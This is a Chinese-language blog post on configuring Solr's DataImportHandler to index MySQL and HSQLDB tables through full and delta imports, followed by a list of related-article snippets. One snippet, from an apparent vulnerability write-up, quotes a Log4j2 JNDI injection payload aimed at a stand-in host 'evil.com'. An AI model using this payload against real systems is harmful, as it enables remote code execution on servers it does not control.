chenzehe

Solr 创建索引 From DataBase

The Data Import Handler Framework

Solr includes a very popular contrib module for importing data known as the DataImportHandler (DIH in short). It's a data processing pipeline built specificallyfor Solr. Here's a summary of notable capabilities:

•    Imports data from databases through JDBC (Java Database Connectivity)
    ° Supports importing only changed records, assuming a last-updated date
•    Imports data from a URL (HTTP GET)
•    Imports data from files (that is it crawls files)
•    Imports e-mail from an IMAP server, including attachments
•    Supports combining data from different sources
•    Extracts text and metadata from rich document formats
•    Applies XSLT transformations and XPath extraction on XML data
•    Includes a diagnostic/development tool

The DIH is not considered a core part of Solr, even though it comes with the Solr download, and so you must add its Java JAR files to your Solr setup to use it. If this isn't done, you'll eventually see a ClassNotFoundException error. The DIH's JAR files are located in Solr's dist directory: apache-solr-dataimporthandler-3.4.0.jar and apache-solr-dataimporthandler-extras-3.4.0.jar. The easiest way to add JAR files to a Solr configuration is to copy them to the <solr_home>/lib directory; you may need to create it. Another method is to reference them from solrconfig.xml via <lib/> tags—see Solr's example configuration for examples of that. You will most likely need some additional JAR files as well. If you'll be communicating with a database, then you'll need to get a JDBC driver for it. If you will be extracting text from various document formats then you'll need to add the JARs in /contrib/extraction/lib. Finally, if you'll be indexing e-mail then you'll need to add the JARs in /contrib /dataimporthandler/lib.

The DIH needs to be registered with Solr in solrconfig.xml like so:

<requestHandler name="/dih_artists_jdbc" 
      class="org.apache.solr.handler.dataimport.DataImportHandler">
    <lst name="defaults">
        <str name="config">mb-dih-artists-jdbc.xml</str>
    </lst>
</requestHandler>

This reference mb-dih-artists-jdbc.xml is located in <solr-home>/conf, which specifies the details of a data importing process. We'll get to that file in a bit.

DIHQuickStart

http://wiki.apache.org/solr/DIHQuickStart

Index a DB table directly into Solr

Step 1 : Edit your solrconfig.xml to add the request handler

<requestHandler name="/dataimport" class="org.apache.solr.handler.dataimport.DataImportHandler">
<lst name="defaults">
  <str name="config">data-config.xml</str>
</lst>
</requestHandler>

Step 2 : Create a data-config.xml file as follows and save it to the conf dir

<dataConfig>
  <dataSource type="JdbcDataSource" 
              driver="com.mysql.jdbc.Driver"
              url="jdbc:mysql://localhost/dbname" 
              user="user-name" 
              password="password"/>
  <document>
    <entity name="id" 
            query="select id,name,desc from mytable">
    </entity>
  </document>
</dataConfig>

Step 3 : Ensure that your solr schema (schema.xml) has the fields 'id', 'name', 'desc'. Change the appropriate details in the data-config.xml

Step 4: Drop your JDBC driver jar file into the <solr-home>/lib directory .

Step 5 : Run the command

http://solr-host:port/solr/dataimport?command=full-import .

Keep in mind that every time a full-import is executed the index is cleaned up. If you do not wish that to happen add clean=false. For example:

http://solr-host:port/solr/dataimport?command=full-import&clean=false

Index the fields in different names

Step: 1 Change the data-config as follows :

<dataConfig>
  <dataSource type="JdbcDataSource" 
              driver="com.mysql.jdbc.Driver"
              url="jdbc:mysql://localhost/dbname" 
              user="user-name" 
              password="password"/>
  <document>
    <entity name="id" 
            query="select id,name,desc from mytable">
       <field column="id" name="solr_id"/>
       <field column="name" name="solr_name"/>
       <field column="desc" name="solr_desc"/>
    </entity>
  </document>
</dataConfig>

Step 2 : This time the fields will be written to the solr fields 'solr_id', 'solr_name', solr_desc'. You must have these fields in the schema.xml.

Step 3 : Run the command http://solr-host:port/dataimpor?command=full-import

Index data from multiple tables into Solr

Step: 1 Change the data-config as follows :

<dataConfig>
  <dataSource type="JdbcDataSource" 
              driver="com.mysql.jdbc.Driver"
              url="jdbc:mysql://localhost/dbname" 
              user="user-name" 
              password="password"/>
  <document>
    <entity name="outer" 
            query="select id,name,desc from mytable">
       <field column="id" name="solr_id"/>
       <field column="name" name="solr_name"/>
       <field column="desc" name="solr_desc"/>
       <entity name="inner"
               query="select details from another_table where id ='${outer.id}'">
              <field column="details" name="solr_details"/> 
       </entity>
    </entity>
  </document>
</dataConfig>

Step 2: The schema.xml should have the solr_details field

Step 3: Run the full-import command

配置数据源

将 dataSource标签直接添加到dataConfig下面，即成为dataConfig的子元素.

<dataSource type="JdbcDataSource" driver="com.mysql.jdbc.Driver" url="jdbc:mysql://localhost/dbname" user="db_username" password="db_password"/>

driver(必需的)：jdbc驱动名称
url（必需的）：jdbc链接
user：用户名
password：密码
批量大小：jdbc链接中的批量大小

数据源也可以配置在solrconfig.xml中
属性type 指定了实现的类型。它是可选的。默认的实现是JdbcDataSource。
属性 name 是datasources的名字，当有多个datasources时，可以使用name属性加以区分
其他的属性都是随意的，根据你使用的DataSource实现而定。
当然你也可以实现自己的DataSource。

多 数据源

<dataSource type="JdbcDataSource" name="ds-1" driver="com.mysql.jdbc.Driver" url="jdbc:mysql://db1-host/dbname" user="db_username" password="db_password"/>

<dataSource type="JdbcDataSource" name="ds-2" driver="com.mysql.jdbc.Driver" url="jdbc:mysql://db2-host/dbname" user="db_username" password="db_password"/>

使用：

..

<entity name="one" dataSource="ds-1" ...>

   ..

</entity>

<entity name="two" dataSource="ds-2" ...>

   ..

</entity>

..

配置data-config.xml

solr document是schema，它的域上的值可能来自于多个表.

data-config.xml的根元素是document。一个document元素代表了一种文档。一个document元素中包含了一个或者多个root实体。一个root实体包含着一些子实体，这些子实体能够包含其他的实体。实体就是，关系数据库上的表或者视图。每个实体都能够包含多个域，每个域对应着数据库返回结果中的一列。域的名字跟列的名字默认是一样的。如果一个列的名字跟solr field的名字不一样，那么属性name就应该要给出。其他的需要的属性在solrschema.xml文件中配置。

为了能够从数据库中取得想要的数据，我们的设计支持标准sql规范。这使得用户能够使用他任何想要的sql语句。root实体是一个中心表，使用它的列可以把表连接在一起。

dataconfig的结构

dataconfig 的结构不是一成不变的,entity和field元素中的属性是随意的，这主要取决于processor和transformer。

以下是entity的默认属性

name(必需的):name是唯一的，用以标识entity
processor:只有当datasource不是RDBMS时才是必需的。默认值是 SqlEntityProcessor
transformer:转换器将会被应用到这个entity上，详情请浏览transformer部分。
pk：entity的主键，它是可选的，但使用“增量导入”的时候是必需。它跟schema.xml中定义的 uniqueKey没有必然的联系，但它们可以相同。
rootEntity：默认情况下，document元素下就是根实体了，如果没有根实体的话，直接在实体下面的实体将会被看做跟实体。对于根实体对应的数据库中返回的数据的每一行，solr都将生成一个document。

一下是SqlEntityProcessor的属性

query (required) :sql语句
deltaQuery : 只在“增量导入”中使用
parentDeltaQuery : 只在“增量导入”中使用
deletedPkQuery : 只在“增量导入”中使用
deltaImportQuery : (只在“增量导入”中使用) . 如果这个存在，那么它将会在“增量导入”中导入phase时代替query产生作用。这里有一个命名空间的用法${dataimporter.delta.}

`Commands`

打开导入数据界面http://192.168.0.248:9080/solr/admin/dataimport.jsp，看到几种按钮分别调用不同的导数据命令。

full-import : "完全导入"这个操作可以通过访问URL http://192.168.0.248:9080/solr/dataimport?command=full-import 完成。
- 这个操作，将会新起一个线程。response中的attribute属性将会显示busy。
- 这个操作执行的时间取决于数据集的大小。
- 当这个操作运行完了以后，它将在conf/dataimport.properties这个文件中记录下这个操作的开始时间
- 当“增量导入”被执行时，stored timestamp这个时间戳将会被用到
- solr的查询在“完全导入”时，不是阻塞的
- 它还有下面一些参数：
  - clean : (default 'true'). 决定在建立索引之前，删除以前的索引。
  - commit : (default 'true'). 决定这个操作之后是否要commit
  - optimize : (default 'true'). 决定这个操作之后是否要优化。
  - debug : (default false). 工作在debug模式下。详情请看 the interactive development mode (see here )
delta-import : 当遇到一些增量的输入，或者发生一些变化时使用http://192.168.0.248:9080/solr/dataimport?command= delta-import .它同样支持 clean, commit, optimize and debug 这几个参数.
status : 想要知道命令执行的状态 , 访问 URL http://192.168.0.248:9080/solr/dataimport .它给出了关于文档创建、删除，查询、结果获取等等的详细状况。
reload-config : 如果data-config.xml已经改变，你不希望重启solr，而要重新加载配置时，运行一下的命令http://192.168.0.248:9080/solr/dataimport?command=reload-config
abort : 你可以通过访问 http://192.168.0.248:9080/solr/dataimport?command=abort 来终止一个在运行的操作

Full Import 例子

data-config.xml 如下：

<dataConfig>

    <dataSource driver="org.hsqldb.jdbcDriver" url="jdbc:hsqldb:/temp/example/ex" user="sa" />

    <document name="products">

        <entity name="item" query="select * from item">

            <field column="ID" name="id" />

            <field column="NAME" name="name" />

            <field column="MANU" name="manu" />

            <field column="WEIGHT" name="weight" />

            <field column="PRICE" name="price" />

            <field column="POPULARITY" name="popularity" />

            <field column="INSTOCK" name="inStock" />

            <field column="INCLUDES" name="includes" />

            <entity name="feature" query="select description from feature where item_id='${item.ID}'">

                <field name="features" column="description" />

            </entity>

            <entity name="item_category" query="select CATEGORY_ID from item_category where item_id='${item.ID}'">

                <entity name="category" query="select description from category where id = '${item_category.CATEGORY_ID}'">

                    <field column="description" name="cat" />

                </entity>

            </entity>

        </entity>

    </document>

</dataConfig>

这里, 根实体是一个名叫“item”的表，它的主键是id。我们使用语句 "select * from item"读取数据. 每一项都拥有多个特性。看下面feature实体的查询语句：

  <entity name="feature" query="select description from feature where item_id='${item.id}'">
       <field name="feature" column="description" />
   </entity>

feature表中的外键item_id跟item中的主键连在一起从数据库中取得该row的数据。相同地，我们将item和category连表（它们是多对多的关系）。注意，我们是怎样使用中间表和标准sql连表的：

 <entity name="item_category" query="select category_id from item_category where item_id='${item.id}'">
    <entity name="category" query="select description from category where id = '${item_category.category_id}'">
        <field column="description" name="cat" />
    </entity>
</entity>

短一点的 data-config

在上面的例子中，这里有好几个从域到solr域之间的映射。如果域的名字和solr中域的名字是一样的话，完全避免使用在实体中配置域也是可以的。当然，如果你需要使用转换器的话，你还是需要加上域实体的。

<dataConfig>

    <dataSource driver="org.hsqldb.jdbcDriver" url="jdbc:hsqldb:/temp/example/ex" user="sa" />

    <document>

        <entity name="item" query="select * from item">                    

            <entity name="feature" query="select description as features from feature where item_id='${item.ID}'"/>            

            <entity name="item_category" query="select CATEGORY_ID from item_category where item_id='${item.ID}'">

                <entity name="category" query="select description as cat from category where id = '${item_category.CATEGORY_ID}'"/>                        

            </entity>

        </entity>

    </document>

</dataConfig>

访问 http://localhost:8983/solr/dataimport?command=full-import 执行一个“完全导入”

使用“增量导入”命令

你可以通过访问URL http://localhost:8983/solr/dataimport?command=delta-import 来使用增量导入。操作将会新起一个线程，response中的属性statue也将显示busy now。操作执行的时间取决于你的数据集的大小。在任何时候，你都可以通过访问 http://localhost:8983/solr/dataimport 来查看状态。

当增量导入被执行的时候，它读取存储在conf/dataimport.properties中的“start time”。它使用这个时间戳来执行增量查询，完成之后，会更新这个放在conf/dataimport.properties中的时间戳。

Delta-Import 例子

我们将使用跟“完全导入”中相同的数据库。注意，数据库已经被更新了，每个表都包含有一个额外timestamp类型的列叫做last_modified。或许你需要重新下载数据库，因为它最近被更新了。我们使用这个时间戳的域来区别出那一行是上次索引以来有更新的。

看看下面的这个 data-config.xm：

<dataConfig>

    <dataSource driver="org.hsqldb.jdbcDriver" url="jdbc:hsqldb:/temp/example/ex" user="sa" />

    <document name="products">

            <entity name="item" pk="ID" query="select * from item"

                deltaQuery="select id from item where last_modified > '${dataimporter.last_index_time}'">           



            <entity name="feature" pk="ITEM_ID" 

                    query="select description as features from feature where item_id='${item.ID}'">                

            </entity>

            <entity name="item_category" pk="ITEM_ID, CATEGORY_ID"

                    query="select CATEGORY_ID from item_category where ITEM_ID='${item.ID}'">

                <entity name="category" pk="ID"

                       query="select description as cat from category where id = '${item_category.CATEGORY_ID}'">                    

                </entity>

            </entity>

        </entity>

    </document>

</dataConfig>

注意到item实体的属性deltaquery了吗，它包含了一个能够查出最近更新的sql语句。注意，变量{dataimporter.last_index_time } 是DataImporthandler传过来的变量，我们叫它时间戳，它指出“完全导入”或者“部分导入”的最后运行时间。你可以在data- config.xml文件中的sql的任何地方使用这个变量，它将在processing这个过程中被赋值。

上面例子中deltaQuery 只能够发现item中的更新，而不能发现其他表的。你可以像下面那样在一个sql语句中指定所有的表的更新:

deltaQuery="select id from item where id in

                                (select item_id as id from feature where last_modified > '${dataimporter.last_index_time}')

                                or id in 

                                (select item_id as id from item_category where item_id in 

                                    (select id as item_id from category where last_modified > '${dataimporter.last_index_time}')

                                or last_modified > '${dataimporter.last_index_time}')

                                or last_modified > '${dataimporter.last_index_time}'"

写一个类似上面的庞大的deltaQuery 并不是一件很享受的工作，我们还是选择其他的方法来达到这个目的

<dataConfig>

    <dataSource driver="org.hsqldb.jdbcDriver" url="jdbc:hsqldb:/temp/example/ex" user="sa" />

    <document>

            <entity name="item" pk="ID" query="select * from item"

                deltaQuery="select id from item where last_modified > '${dataimporter.last_index_time}'">

                <entity name="feature" pk="ITEM_ID" 

                    query="select DESCRIPTION as features from FEATURE where ITEM_ID='${item.ID}'"

                    deltaQuery="select ITEM_ID from FEATURE where last_modified > '${dataimporter.last_index_time}'"

                    parentDeltaQuery="select ID from item where ID=${feature.ITEM_ID}"/>              

            
            <entity name="item_category" pk="ITEM_ID, CATEGORY_ID"

                    query="select CATEGORY_ID from item_category where ITEM_ID='${item.ID}'"

                    deltaQuery="select ITEM_ID, CATEGORY_ID from item_category where last_modified > '${dataimporter.last_index_time}'"

                    parentDeltaQuery="select ID from item where ID=${item_category.ITEM_ID}">

                <entity name="category" pk="ID"

                        query="select DESCRIPTION as cat from category where ID = '${item_category.CATEGORY_ID}'"

                        deltaQuery="select ID from category where last_modified > '${dataimporter.last_index_time}'"

                        parentDeltaQuery="select ITEM_ID, CATEGORY_ID from item_category where CATEGORY_ID=${category.ID}"/>

            </entity>

        </entity>

    </document>

</dataConfig>

deltaQuery 取得从上次索引更新时间以来有更新的实体的主键。
parentDeltaQuery 从deltaQuery中取得当前表中更新的行，并把这些行提交给父表。因为，当子表中的一行发生改变时，我们需要更新它的父表的solr文档。

下面是一些值得注意的地方:

对于query语句返回的每一行，子实体的query都将被执行一次
对于deltaQuery返回的每一行，parentDeltaQuery都将被执行。
一旦根实体或者子实体中的行发生改变，我们将重新生成包含该行的solr文档。

补充：

query是获取全部数据的SQL
deltaImportQuery是获取增量数据时使用的SQL
deltaQuery是获取pk的SQL
parentDeltaQuery是获取父Entity的pk的SQL

Full Import工作原理：
执行本Entity的Query，获取所有数据；
针对每个行数据Row，获取pk，组装子Entity的Query；
执行子Entity的Query，获取子Entity的数据。

Delta Import工作原理：
查找子Entity，直到没有为止；
执行Entity的deltaQuery，获取变化数据的pk；
合并子Entity parentDeltaQuery得到的pk；
针对每一个pk Row，组装父Entity的parentDeltaQuery；
执行parentDeltaQuery，获取父Entity的pk；
执行deltaImportQuery，获取自身的数据；
如果没有deltaImportQuery，就组装Query

限制：
子Entity的query必须引用父Entity的pk
子Entity的parentDeltaQuery必须引用自己的pk
子Entity的parentDeltaQuery必须返回父Entity的pk
deltaImportQuery引用的必须是自己的pk

分布式搜索引擎Elasticsearch——基础敲代码的旺财架构进阶 elasticsearch java 搜索引擎 ES-head
文章目录一、Lucene与Solr与Elasticsearch二、ES核心术语三、ES核心概念四、倒排索引五、ES的安装（centos7）1、下载地址（这里安装linux版本）2、解压压缩包3、修改配置文件(1)修改核心配置文件(2)修改JVM配置文件4、启动ES(1)添加系统用户并授权(2)ES启动(3)修改配置文件(4)再次启动ES六、安装ES-head插件（可视化管理插件）1、使用谷歌市场安
Java高级技术day75：Zookeeper与Dubbo 开源oo柒
一、Zookeeper的介绍1.Zookeeper介绍：顾名思义zookeeper就是动物园管理员，他是用来管hadoop（大象）、Hive(蜜蜂)、pig(小猪)的管理员，ApacheHbase和ApacheSolr的分布式集群都用到了zookeeper；Zookeeper:是一个分布式的、开源的程序协调服务，是hadoop项目下的一个子项目。他提供的主要功能包括：配置管理、名字服务、分布式锁、
Elasticsearch详解es 思静语 elasticsearch elasticsearch 大数据搜索引擎
文章目录概述es架构为什么要使用ElasticSearchElasticSearch的优势使用场景es为什么这么快倒排索引如何保证ES和数据库的数据一致性监听binlog同步双写elasticsearch是如何实现master选举的Elasticsearch与Solr的区别概述ES全称是ElasticSearch，它是一个建立在全文搜索引擎库Lucene基础上的开源搜索和分析引擎。ES它本身具有分
08、全文检索 -- Solr -- 使用 SolrClient 连接 Solr（演示手动配置自定义的SolrClient 并在测试类使用 solrClient 进行添加、查询、删除文档的操作） _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr lucene
目录SolrClientSolrClient的功能SolrClient这个API包含如下常用方法：SolrClient方法的说明：SpringBootStarterDataSolr的不足手动配置自定义的SolrClientSolrClient代码演示配置自定义的SolrClient1、创建一个SpringBoot项目，添加依赖2、SolrAutoConfiguration解析3、手动配置自定义的S
java 商城全文搜索_利用solr实现商品的搜索功能闲侃数码 java 商城全文搜索
后期补充：为什么要用solr服务，为什么要用luncence？问题提出：当我们访问购物网站的时候，我们可以根据我们随意所想的内容输入关键字就可以查询出相关的内容，这是怎么做到呢？这些随意的数据不可能是根据数据库的字段查询的，那是怎么查询出来的呢，为什么千奇百怪的关键字都可以查询出来呢？答案就是全文检索工具的实现，luncence采用了词元匹配和切分词。举个例子：北京天安门------luncenc
solr7集群 springboot_springboot 集成solr 骑lv上高速 solr7集群 springboot
一、版本介绍：jdk1.8tomcat8springboot2.1.3RELEASE(这里有坑,详见下文)solr7.4.0(没有选择最新的版本,是因为项目的boot版本是2.1.3,其对应的solr-solrj.jar版本是7.4.0，为避免出现不可预料不可抗拒不可解决的问题，谨慎选用与之一样版本)二、solr服务器搭建下载1.tomcat8的下载不赘述；2.solr下载：进入solr官网，找历
09、全文检索 -- Solr -- SpringBoot 整合 Spring Data Solr （生成DAO组件和实现自定义查询方法） _L_J_H_ #全文检索（Solr 和 Elasticsearch）spring 全文检索 solr
目录SpringBoot整合SpringDataSolrSpringDataSolr的功能（生成DAO组件）：SpringDataSolr大致包括如下几方面功能：@Query查询（属于半自动）代码演示：1、演示通过dao组件来保存文档1、实体类指定索引库2、修改日志级别3、创建Dao接口4、先删除所有文档5、创建测试类6、演示结果2、根据title_cn字段是否包含关键字来查询3、查询指定价格范围
vulhub中Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）余生有个小酒馆 vulhub漏洞复现 apache log4j 安全
ApacheLog4j2是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入，执行任意代码。1.服务启动后，访问`http://your-ip:8983`即可查看到ApacheSolr的后台页面。2.`$
solr —— 1 全文检索Solr8.0第一部分苏打饼干没加心 solr
solr，毕设啊，快被写完吧1solr介绍什么是solrLucene与Solr与ES为什么要用slor2HelloWorld2.1项目安装部署2.2项目安装配置创建核心创建document(表)添加文件查询数据3solr后台管理页面详解控制面板5全文检索千万级别数据实战，全面剖析架构设计，大数据瓶颈突破6数据库导入索引BV1Dt411G7eF1solr介绍什么是solrsolr简化了程序员的操作L
（三十七）大数据实战——Solr服务的部署安装厉害哥哥吖大数据大数据 solr
前言Solr是一个基于ApacheLucene的开源搜索平台，它提供了强大的全文搜索、分布式搜索和数据分析功能。Solr可以用于构建高性能的搜索应用程序，支持从海量数据中快速检索和分析信息。Solr使用倒排索引和先进的搜索算法，可实现快速而准确的全文搜索。Solr可以在多个服务器上进行水平扩展，实现分布式搜索和负载均衡。Solr支持复杂的过滤、排序和范围查询，使您可以根据各种条件对搜索结果进行精确
ElasticSearch VS. Solr VS. Sphinx：最好的开源搜索引擎比较 chenxiyy3773 大数据人工智能数据库
译者按：本文是来自一家乌克兰技术公司的文章。该文章译者认为着重在应用上，而非单纯的性能对比。给自己的平台选择一个合适的搜索引擎比任何一个吹嘘技术强大的好。虽然最近一两年ES发展飞速，但sphinx的简单易用性还是赢得很多机构公司的青睐，比如优酷土豆都是用sphinx。所以使用之前，务必先了解自己的业务诉求，再选择合适的搜索引擎，而非一昧跟风。翻译若有误请指正，谢谢查看！编译自：ELASTICSEA
阿里P8架构师谈：开源搜索引擎Lucene、Solr、Sphinx等优劣势比较 liuhuiteng 中间件中间件
开源搜索引擎分类1.Lucene系搜索引擎，java开发,包括：LuceneSolrElasticsearchKatta、Compass等都是基于Lucene封装。你可以想象Lucene系有多强大。2.Sphinx搜素引擎，c++开发,简单高性能。以下重点介绍最常用的开源搜素引擎：Lucene、Solr、Elasticsearch、Sphinx的特点和优劣势选型比较。Lucene1.Lucene简
使用solr6.0搭建solrCloud 牛初九
使用solr6.0搭建solrCloud一、搭建zookeeper集群下载zookeeper压缩包到自己的目录并解压（本例中的目录在/opt下），zookeeper的根目录我们在这里用${ZK_HOME}表示。在${ZK_HOME}/conf下创建zoo.cfg文件，可以复制zoo_sample.cfg文件：cpzoo_sample.cfgzoo.cfg修改zoo.cfg的内容如下：vimzoo.
Error CREATEing SolrCore 'index': Unable to create core: index Caused by: No enum constant org.apach 杉斯狼后台 Java solr enum 索引 lucene
ErrorCREATEingSolrCore'index':Unabletocreatecore:indexCausedby:Noenumconstantorg.apache.lucene.util.Version.LUCENE_48出错原因：solr版本配置不正确解决方法：在索引文件的目录下conf>solrconfig.xml4.8将4.8修改为4.7（你具体的版本，可以参照collectio
solr 或查询 or query 杉斯狼 solr solr java web java lucene
MenuId:(472e44eaac735772ef44366OR80f24930dcf7131262d9OR51e8f9844f8bd1283ac)如上句，格式为key:(value1ORvalue2ORvalue3OR...)注意，OR必须为大写，同时两边各有一空格。
尚学堂102天总结+springdata-redis 人间草木为伴
102天行百里者半九十，想要在一个行业里成为顶尖人才，一定满足一万小时定律，要想学好JAVA，需要持之以恒不断地努力,每天都要勤思考+善于询问+解决问题!知识温故而知新>>>>>>Linux下安装solr的教程555.pngSpringBoot2.2以上版本添加junit进行测试的方法h111.pngMaven依赖中标签的作用image.png./的作用和用法image.png启动和关闭redis
开源大数据集群部署（九）Ranger审计日志集成（solr）大数据部署
作者：櫰木1、下载solr安装包并解压包tar-xzvfsolr-8.11.2.gzcdsolr-8.11.2执行安装脚本./bin/install_solr_service.sh/opt/solr-8.11.2.tgz安装后，会在/etc/default/下生成solr.in.sh文件。2、在rangeradmin下生成solr相关配置cd/opt/ranger-2.3.0-admin/cont
Lucene/Solr/Elasticsearch可视化工具luke的下载及使用景小悦 lucene luke elasticsearch solr
※※使用的luke版本一定与lucene一致，否则会出现问题。luke下载地址：https://github.com/DmitryKey/luke/releasesluke是一个用于Lucene/Solr/Elasticsearch搜索引擎，方便开发和诊断的GUI（可视化）工具。luke:Luke是查询LUCENE索引文件的工具，而且用Luke的Search可以做查询Lukeisahandydev
CVE-2017-12149漏洞复现黑客大佬漏洞复现 web安全安全网络 python
服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish漏洞复现中间件及框架列表：IIS，Apache，Nginx，Tomcat，Docker，Weblogic，JBoos，WebSphere，Jenkins，GlassFish，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等1、中间件-Web
【知识整理】技术新人的培养计划卢卡上学文心一言 AIGC 人工智能 php 技术团队新人培养 git
一、培养计划落地实操1.概要新人入职，要给予适当的指导，目标：1、熟悉当前环境：生活环境：吃饭、交通、住宿、娱乐工作环境：使用的工具，Mac、maven、git、idea等2、熟悉并掌握工作技能：技术栈：Spring、Hibernate、Cache、Solr、MySQL（根据公司内部技术使用调整）内部协作工具：wiki（Confluence）、task（JIRA）、git（Stash）快捷操作：M
Apache Log4j2漏洞复现（反弹shell）安全菜 apache
0x01漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，ApacheStruts2、ApacheSolr、ApacheDruid、Apa
2021最新版 ElasticSearch 7.6.1 教程详解爬虫jsoup+es模拟京东搜索（狂神说） Super_Song_ 中间件 elasticsearch 搜索引擎 java nosql
文章目录一、ElasticSearch简介1.了解创始人DougCutting2.Lucene简介3.ElasticSearch简介4.ElasticSearch和Solr的区别5.了解ELK二、软件安装1.ElasticSearch2.ElasticSearchHead3.Kibana三、ElasticSearch使用详解1.ES核心概念文档索引倒排索引ik分词器2.命令模式的使用Rest风格说
大数据用户画像系统架构设计充电了么
文章目录一、用户画像数据仓库搭建、数据抽取部分二、大数据平台、用户画像集市分层设计、处理三、离线计算部分四、实时计算部分五、Solr/ES搜索引擎部分六、JavaWeb毫秒级实时用户画像接口服务七、用户画像实时展示异步触发获取Web自助后台总结用户画像是一个非常通用普遍使用的系统，从我们的架构图中可以看出，从数据计算时效性上来讲分离线计算和实时计算。离线计算一般是每天晚上全量计算所有用户，或者按需
Apache Log4j2 漏洞原理仲瑿漏洞原理 apache log4j java
ApacheLog4j远程代码执行漏洞1.漏洞危害ApacheLog4j被发现存在一处任意代码执行漏洞，由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。经验证，ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等众多组件与大型应用均受影响2.影响版本ApacheLog4j2.x<=2.14.13.漏
rm: relocation error: /lib64/libc.so.6: symbol _dl_starting_up, version GLIBC_PRIVATE not defined in feifeidata
由于安装glibc-2.23.tar.gz导致系统出错，命令不能用恢复方法：进入/usr/lib64目录，使用ls-ltr命令ls-ltrlrwxrwxrwx.1rootroot2112月1421:46ld-linux-x86-64.so.2->/usr/lib64/ld-2.17.solrwxrwxrwx.1rootroot2312月1421:51libc.so.6->/usr/lib64/li
安全漏洞(1)-Log4j2远程代码执行漏洞，log4j2漏洞验证迷途的小兵安全体系_加解密算法安全 log4j2 安全漏洞
漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等均受影响。漏洞评级CVE-2021
揭秘Elasticsearch：一文读懂分布式搜索与分析引擎的核心概念超越不平凡 elasticsearch 分布式大数据
Elasticsearch是一个开源、分布式、实时搜索和分析引擎，专门用于处理大规模数据的快速检索与分析。它建立在ApacheLucene的基础上，但提供了比Lucene更为丰富的功能和友好的RESTfulAPI接口，使得开发者能够轻松地进行全文搜索、结构化搜索以及对海量数据进行复杂的聚合操作。Elasticsearch目前被广泛用于互联网多种领域中。一是搜索领域，相对于solr，成为很多搜索的不
07、全文检索 -- Solr -- Solr 全文检索之为索引库添加中文分词器 _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr 中文分词
目录Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词器的jar包2、修改managed-schema配置文件什么是fieldType3、添加停用词文档4、重启solr5、添加【*_cn】动态字段，并为该字段设置中文分词器6、演示分词器的区别演示text_cjk这个简单的分词器演示text_cn这个中文分词器Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词
全文检索服务器：Solr xiayehuimou solr solr 全文检索服务器
官网https://solr.apache.org/官方文档https://solr.apache.org/guide/solr/latest/deployment-guide/solrj.html1.介绍Solr是一个高性能，采用Java开发，基于Lucene的开源全文搜索服务器不仅限于搜索，Solr也可以用于存储目的。像其他NoSQL数据库一样，它是一种非关系数据存储和处理技术。solr需要运
php solr 全文检索引擎,【搜索引擎】Solr Suggester 实现全文检索功能-分词和和自动提示... 一十马 php solr 全文检索引擎
功能需求全文检索搜索引擎都会有这样一个功能：输入一个字符便自动提示出可选的短语：要实现这种功能，可以利用solr的SuggestComponent，SuggestComponent这种方法利用Lucene的Suggester实现，并支持Lucene中可用的所有查找实现。实现1.配置managed-schema文件配置自己core文件夹conf下的managed-schema文件这个是自己的字段：新
jvm调优总结（从基本概念到深度优化） oloz java jvm jdk 虚拟机应用服务器
JVM参数详解：http://www.cnblogs.com/redcreen/archive/2011/05/04/2037057.html Java虚拟机中，数据类型可以分为两类：基本类型和引用类型。基本类型的变量保存原始值，即：他代表的值就是数值本身；而引用类型的变量保存引用值。“引用值”代表了某个对象的引用，而不是对象本身，对象本身存放在这个引用值所表示的地址的位置。
【Scala十六】Scala核心十：柯里化函数 bit1129 scala
本篇文章重点说明什么是函数柯里化，这个语法现象的背后动机是什么，有什么样的应用场景，以及与部分应用函数(Partial Applied Function)之间的联系 1. 什么是柯里化函数 A way to write functions with multiple parameter lists. For instance def f(x: Int)(y: Int) is a
HashMap dalan_123 java
HashMap在java中对很多人来说都是熟的；基于hash表的map接口的非同步实现。允许使用null和null键；同时不能保证元素的顺序；也就是从来都不保证其中的元素的顺序恒久不变。 1、数据结构在java中，最基本的数据结构无外乎：数组和引用（指针），所有的数据结构都可以用这两个来构造，HashMap也不例外，归根到底HashMap就是一个链表散列的数据
Java Swing如何实时刷新JTextArea，以显示刚才加append的内容周凡杨 java 更新 swing JTextArea
在代码中执行完textArea.append("message")后，如果你想让这个更新立刻显示在界面上而不是等swing的主线程返回后刷新，我们一般会在该语句后调用textArea.invalidate()和textArea.repaint()。问题是这个方法并不能有任何效果，textArea的内容没有任何变化，这或许是swing的一个bug，有一个笨拙的办法可以实现
servlet或struts的Action处理ajax请求 g21121 servlet
其实处理ajax的请求非常简单，直接看代码就行了： //如果用的是struts //HttpServletResponse response = ServletActionContext.getResponse(); // 设置输出为文字流 response.setContentType("text/plain"); // 设置字符集 res
FineReport的公式编辑框的语法简介老A不折腾 finereport 公式总结
FINEREPORT用到公式的地方非常多，单元格（以=开头的便被解析为公式），条件显示，数据字典，报表填报属性值定义，图表标题，轴定义，页眉页脚，甚至单元格的其他属性中的鼠标悬浮提示内容都可以写公式。简单的说下自己感觉的公式要注意的几个地方： 1.if语句语法刚接触感觉比较奇怪，if(条件式子,值1,值2)，if可以嵌套，if(条件式子1，值1，if(条件式子2，值2，值3)
linux mysql 数据库乱码的解决办法墙头上一根草 linux mysql 数据库乱码
